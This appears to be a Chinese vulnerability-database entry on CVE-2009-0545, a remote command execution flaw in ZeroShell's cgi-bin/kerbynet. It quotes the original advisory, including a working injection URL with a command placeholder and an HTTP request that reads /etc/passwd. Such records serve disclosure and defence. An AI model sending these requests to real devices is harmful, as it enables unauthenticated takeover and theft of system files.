ZeroShell 'cgi-bin/kerbynet' 远程指令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117369 漏洞类型 输入验证
发布时间 2009-02-09 更新时间 2009-02-23
CVE编号 CVE-2009-0545 CNNVD-ID CNNVD-200902-289
漏洞平台 Hardware CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/8023
https://www.securityfocus.com/bid/33702
https://cxsecurity.com/issue/WLB-2009020029
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-289
|漏洞详情
ZeroShell是为嵌入式设备开发的一个基于Linux的网络服务器系统的操作系,是Linux的一个发行版,能提供路由、桥接、防火墙等各种主要网络功能。ZeroShell1.0beta11及之前版本中的cgi-bin/kerbynet允许远程攻击者借助NoAuthREQx509List操作中的类别参数里的外壳元字符,执行任意指令。
|漏洞EXP
==================================================== 
ZeroShell <= 1.0beta11 Remote Code Execution

Original Advisory: 
http://www.ikkisoft.com/stuff/LC-2009-01.txt

luca.carettoni[at]ikkisoft[dot]com
==================================================== 


ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution 
for servers and embedded devices. This Linux distro can be configured 
and managed with an easy to use web console.

ZeroShell is prone to an arbitrary code execution vulnerability due to
an improper input validation mechanism. An aggressor may abuse this 
weakness in order to compromise the entire system. 
Authentication is not required in order to exploit this flaw.

[Proof of Concept]
  
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
  
In addition to the Unix commands, it is possible to abuse the 
ZeroShell scripts themself. For instance it is likely to use the 
"getkey" script in order to retrieve remote files, including the content
in the html page.
  
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: <IP>

# milw0rm.com [2009-02-09]
|受影响的产品
Fulvio Ricciardi ZeroShell 1.0beta11
|参考资料

来源:MISC
链接:http://www.zeroshell.net/eng/patch-details/#C100
来源:MISC
链接:http://www.zeroshell.net/eng/announcements/
来源:VUPEN
名称:ADV-2009-0385
链接:http://www.frsirt.com/english/advisories/2009/0385
来源:BUGTRAQ
名称:20090209ZeroShell<=1.0beta11RemoteCodeExecution
链接:http://www.securityfocus.com/archive/1/archive/1/500763/100/0/threaded
来源:MILW0RM
名称:8023
链接:http://www.milw0rm.com/exploits/8023
来源:MISC
链接:http://www.ikkisoft.com/stuff/LC-2009-01.txt